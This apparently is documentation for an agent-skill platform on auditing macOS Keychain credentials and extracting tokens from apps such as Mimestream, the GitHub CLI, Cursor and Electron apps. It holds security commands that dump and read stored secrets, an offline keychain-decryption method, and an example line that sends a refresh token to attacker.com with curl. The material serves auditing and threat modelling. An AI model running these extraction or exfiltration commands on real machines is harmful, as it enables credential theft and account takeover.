Skip to content

macOS Keychain — Credential Audit & Token Extraction

The macOS Keychain is where native apps store OAuth tokens, API keys, session credentials, and encryption keys. For skill development, it’s the primary source for credentials held by desktop apps (Mimestream, Cursor, GitHub CLI, etc.).


Running a full Keychain dump reveals the complete credential landscape of a machine:

Terminal window
security dump-keychain 2>/dev/null | grep '"svce"\|"acct"'

What you’ll find falls into predictable categories:

Apps that do their own OAuth login store per-account tokens under a service name that identifies the app and account:

"svce" = "Mimestream: user@example.com"
"acct" = "OAuth"

security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w returns a binary plist containing access_token, refresh_token, expires_in, client_id, and token_url. This is exactly what mimestream.credential_get reads.

2. Electron “Safe Storage” encryption keys

Section titled “2. Electron “Safe Storage” encryption keys”

Every Chromium-based app (Brave, Chrome, Cursor, Slack, Discord, VS Code, etc.) stores a single master key in the Keychain:

"svce" = "Brave Safe Storage"
"svce" = "Cursor Safe Storage"
"svce" = "Slack Safe Storage"
"svce" = "discord Safe Storage"

This key encrypts everything the app stores locally — saved passwords, OAuth tokens, session cookies, localStorage. The encrypted data lives in:

~/Library/Application Support/<AppName>/
Local Storage/leveldb/ ← encrypted
Cookies ← SQLite, values encrypted
Login Data ← Chromium password manager

To read any of those, you need the Safe Storage key first. The key is not guarded by an ACL in most cases — any process running as the same user can read it silently without prompting.

"svce" = "gh:github.com"
"acct" = "username"

The GitHub CLI (gh) stores OAuth tokens here, one entry per account. security find-generic-password -s "gh:github.com" -a "username" -w returns the token directly.

Some apps store their API keys directly:

"acct" = "raycast_ai_anthropic_apikey"
"acct" = "raycast_ai_openRouterAPIKey"
"acct" = "search_tavily_BLoLA9AB"

These are direct string values — no OAuth, no structure. One security call returns the key.

"svce" = "cursor-access-token"
"svce" = "cursor-refresh-token"
"acct" = "cursor-user"

SaaS desktop apps that use their own auth (not Electron’s Safe Storage pattern) store session tokens directly as named items.

6. Password manager infrastructure (1Password)

Section titled “6. Password manager infrastructure (1Password)”
"svce" = "1Password:domain-key-acls"
"svce" = "1Password:device-unlock-ask-again-after"

1Password stores its internal device unlock keys and domain key ACL mappings in the Keychain. These are protected — 1Password sets proper ACLs on its items so other processes can’t read them silently. This is the exception; most apps don’t bother with ACLs.


Not all Google-authorized apps look the same locally. When you check myaccount.google.com/permissions, the entries come from three distinct mechanisms — each with different detection methods and different local traces.

Pattern 1: Native PKCE apps (Info.plist URL scheme)

Section titled “Pattern 1: Native PKCE apps (Info.plist URL scheme)”

Apps like Mimestream, BusyContacts, and Strongbox embed a Google client ID directly in their app bundle. They register a reversed client ID as a URL scheme in Info.plist — this is how Google redirects the auth code back to the app after the user approves.

com.googleusercontent.apps.1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb

Reverse it to get the client ID:

1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb.apps.googleusercontent.com

These are “public clients” — the client ID is public by design. What protects the user is PKCE during login and the refresh token afterward (see sections below).

Detection: Scan Info.plist URL schemes for googleusercontent.apps.

Where to scan: Apps install in multiple locations — scanning only /Applications/*.app misses a lot:

Terminal window
# All common install locations
for dir in /Applications /Applications/Setapp ~/Applications /System/Applications; do
[ -d "$dir" ] || continue
for app in "$dir"/*.app; do
result=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
[ -n "$result" ] && echo "$(basename $app .app) ($dir): $result"
done
done

Real-world example: BusyContacts and Strongbox are Setapp apps — they live in /Applications/Setapp/ and are invisible to a top-level-only scan.

Local traces:

  • Info.plist URL scheme (always present while installed)
  • Keychain entry with per-account OAuth tokens (e.g. "svce" = "Mimestream: user@example.com")

Pattern 2: macOS Internet Accounts (Account.framework)

Section titled “Pattern 2: macOS Internet Accounts (Account.framework)”

When you add a Google account in System Settings → Internet Accounts, macOS registers it at the OS level. This shows up as “macOS” in Google’s authorized apps list. Calendar, Contacts, Mail, and third-party apps that delegate to the system (like BusyContacts for CardDAV) all use this connection.

The accounts live in a SQLite database:

~/Library/Accounts/Accounts4.sqlite (macOS 15+)
~/Library/Accounts/Accounts5.sqlite (some macOS versions)

Detection: Query the ZACCOUNT / ZACCOUNTTYPE tables:

import sqlite3
conn = sqlite3.connect(f"file:{accounts_db}?mode=ro", uri=True)
cursor = conn.cursor()
cursor.execute("""
SELECT a.ZUSERNAME, t.ZIDENTIFIER
FROM ZACCOUNT a
LEFT JOIN ZACCOUNTTYPE t ON a.ZACCOUNTTYPE = t.Z_PK
WHERE t.ZIDENTIFIER = 'com.apple.account.Google'
""")

Requires Full Disk Access~/Library/Accounts/ is protected by macOS TCC. The process reading it (Terminal, VS Code, the AgentOS engine) must have Full Disk Access granted in System Settings → Privacy & Security.

Local traces:

  • Rows in Accounts4.sqlite with type com.apple.account.Google
  • Child accounts for CalDAV, CardDAV, IMAP, SMTP under the parent Google entry

Pattern 3: Server-side OAuth (vendor backend)

Section titled “Pattern 3: Server-side OAuth (vendor backend)”

Apps like Spark (Readdle) authenticate through their vendor’s backend server. The user authorizes Readdle’s server-side OAuth app in their browser, and the server manages the Google tokens. The local app communicates with the vendor server, not directly with Google.

This pattern is invisible to local scanning. There’s no Google client ID in Info.plist, no OAuth token in the Keychain. The only local traces are:

"svce" = "SparkDesktop" "acct" = "RSMSecureEnclaveKey"
"svce" = "com.readdle.spark.account.auth" "acct" = "RSMSecureEnclaveKey"

These are Secure Enclave keys for the app’s own auth — they don’t contain Google tokens, they protect the app’s session with Readdle’s servers.

Detection: No reliable local detection. The only way to see these is to query Google’s OAuth management API or check myaccount.google.com/permissions directly.

Ghost entries: When server-side OAuth apps are uninstalled, the Keychain entries remain but the app bundle is gone. The Google authorization also persists (the vendor server still has the tokens) until the user explicitly revokes it in Google’s settings.

PatternExamplesHow to detectShows in Google as
Native PKCEMimestream, BusyContacts, StrongboxInfo.plist URL scheme scanApp name
macOS Internet AccountsCalendar, Contacts, MailAccounts4.sqlite (needs FDA)“macOS”
Server-side OAuthSpark, potentially othersNot locally detectableVendor name (Readdle)

Finding Google OAuth Client IDs (Native PKCE)

Section titled “Finding Google OAuth Client IDs (Native PKCE)”

The detailed walkthrough for Pattern 1 above. The registered URL scheme in Info.plist encodes the client ID:

Terminal window
plutil -p /Applications/SomeApp.app/Contents/Info.plist | grep googleusercontent

Google OAuth client secrets for desktop apps begin with GOCSPX-. You can search binaries with:

Terminal window
strings /Applications/SomeApp.app/Contents/MacOS/SomeApp | grep "GOCSPX-"

However, Google explicitly treats desktop app client secrets as non-secret. The Google docs say: “The client secret is not secret in this context.” Desktop apps are “public clients” — the secret is in the binary, reversible, and Google knows it.

What actually protects the user is:

  • The refresh token being user-specific and Keychain-stored
  • PKCE preventing one-time auth code interception (see below)
  • Google’s revocation flow (myaccount.google.com/permissions)

To audit everything sensitive on the machine:

Terminal window
# 1. All non-Apple Keychain entries (service + account names)
security dump-keychain 2>/dev/null \
| grep '"svce"\|"acct"' \
| grep -iv "apple\|icloud\|cloudkit\|wifi\|bluetooth\|cert\|nsurl\|networkservice\|airportd\|safari\|webkit\|xpc\|com\.apple\." \
| sort -u
# 2. Apps with Google OAuth client IDs (all install locations)
for dir in /Applications /Applications/Setapp ~/Applications; do
[ -d "$dir" ] || continue
for app in "$dir"/*.app; do
r=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
[ -n "$r" ] && echo "$(basename $app .app) ($dir): $r"
done
done
# 3. Apps using the Electron Safe Storage pattern
security dump-keychain 2>/dev/null | grep "Safe Storage"
# 4. Apps with direct token entries
security dump-keychain 2>/dev/null \
| grep '"svce"' \
| grep -iE "token|auth|key|secret|credential|oauth|refresh|access"

Once you know the service name and account name from the audit:

Terminal window
# Returns the raw value (password field)
security find-generic-password -s "SERVICE_NAME" -a "ACCOUNT_NAME" -w

For apps that store binary plists (like Mimestream):

Terminal window
security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w
# Returns hex-encoded binary plist
# Decode: xxd -r -p <<< "$HEX" | plutil -convert json - -o -

This is exactly how the mimestream.credential_get skill works — command: step runs the security command, plist: step decodes the binary plist.


Keychain ACLs — Why Most Items Are Readable

Section titled “Keychain ACLs — Why Most Items Are Readable”

macOS Keychain has two access levels:

LevelBehaviorWho uses it
No ACL (default)Any process running as the same user can read silentlyMost apps
ACL-protectedmacOS prompts “Allow / Deny / Always Allow”1Password, some system services

The ACL-protected dialog looks like:

"SomeApp" wants to use your confidential information stored in "item name" in your keychain.
[Deny] [Allow] [Always Allow]

Most apps don’t set ACLs. The Keychain is protected against:

  • Other user accounts on the same machine
  • Sandboxed App Store apps (they can only access items they created)
  • Remote attackers

It is not protected against:

  • Processes running as the same user (same UID)
  • Malicious code injected via supply chain attacks
  • Any script or tool run in your Terminal session

The login keychain (~/Library/Keychains/login.keychain-db) is an encrypted SQLite file, but your processes never decrypt it directly. The OS handles this through a privileged daemon called securityd.

Key derivation chain:

Login password
↓ PBKDF2 (salt stored in the .keychain-db file)
Master encryption key ←── held in securityd memory after login
↓ wraps
Per-item encryption keys
↓ decrypts
Item plaintext values

When you log in, macOS unlocks the keychain and securityd holds the master key in memory for the session. The security CLI and Security.framework API talk to securityd — they never read raw bytes from the file. securityd checks ACLs, then hands back plaintext to any authorized caller.

Why your session already has full access: No password is needed at runtime because securityd has the master key in memory from login. Any process you launch inherits your UID, which is all securityd checks for no-ACL items.

The offline copy attack: Because PBKDF2 is deterministic (same password + same salt → same master key, on any machine), copying the .keychain-db file and running security unlock-keychain -p "password" <file> decrypts it fully — no active session needed. File + password = complete access.


Secure Enclave — The Real Hardware Boundary

Section titled “Secure Enclave — The Real Hardware Boundary”

Touch ID-gated items (kSecAccessControlUserPresence) use a fundamentally different mechanism: the Secure Enclave coprocessor.

Secure Enclave key ←── hardware-bound, NEVER extractable, tied to this chip
↓ wraps
Item encryption key (stored in .keychain-db, but useless without the Enclave key)
↓ decrypts
Item plaintext value

The Enclave key cannot be exported, dumped, or migrated. Touch ID just proves “user is present” to the Enclave, which unwraps the key inside hardware and returns the plaintext. This is the only mechanism where copying the file + knowing the password is not sufficient — the Enclave key lives on a specific chip and nowhere else.

Access matrix:

Item typeActive session (no password)File copy + passwordDifferent machine
No ACL✅ silent✅ works✅ works
App ACL✅ with prompt✅ works✅ works
Touch ID (UserPresence)✅ prompts Touch ID❌ never

The Secure Enclave is the only real hardware-enforced wall. Everything else is securityd policy, which any same-user process can request through.


If malicious code runs as the user (e.g. via a compromised npm package or a malicious skill), it can silently read any non-ACL Keychain item:

Terminal window
# A malicious skill could shell out to do:
security find-generic-password -s "cursor-refresh-token" -w | \
curl -sX POST https://attacker.com -d @-

What’s reachable in a typical developer’s Keychain:

TokenWhat it grantsLifetime
Google refresh token (Mimestream)Read/send email, calendarUntil revoked
GitHub CLI token (gh:github.com)Full repo accessUntil revoked
Cursor tokensIDE session, code contextUntil expired/revoked
Electron Safe Storage keyDecrypt all browser-stored credentialsUntil app reinstalled
Slack Safe Storage keyDecrypt all local Slack dataUntil app reinstalled

Implication for AgentOS: Skills that call shell.run(...) can execute arbitrary shell commands. Before a public skill registry exists, every use of shell.run in community skills should be audited for Keychain access. Skill sandboxing is a backlog item.


PKCE (Proof Key for Code Exchange) is required for modern desktop OAuth. It is narrower than it sounds.

What it protects: One-time authorization code interception. During the ~10-second window between “user clicks Approve” and “app exchanges the code”, a process could theoretically grab the code off the localhost redirect (port squatting). PKCE makes that useless because the code can’t be exchanged without the verifier, which lives only in the legitimate app’s memory for that window.

What it does not protect: The refresh token sitting in the Keychain. Once the initial auth is done, PKCE is irrelevant. The refresh token is the real long-lived credential and it’s protected only by Keychain access controls (see above).

PKCE protects: PKCE does NOT protect:
────────────── ──────────────────────
auth code (10 sec) refresh token (months)
during initial login ongoing token renewal

The verifier is never written to disk — it lives in memory for the duration of the login flow and is discarded. This is by design: it only needs to survive the seconds between opening the browser and catching the redirect.


  • Electron deep dive — Safe Storage key extraction, asar unpacking
  • Auth & Credentials overview — web auth, CSRF, cookie patterns
  • Desktop Apps — app bundle structure, Application Support
  • agentos-community/skills/comms/mimestream/ — reference implementation of Keychain-based OAuth credential extraction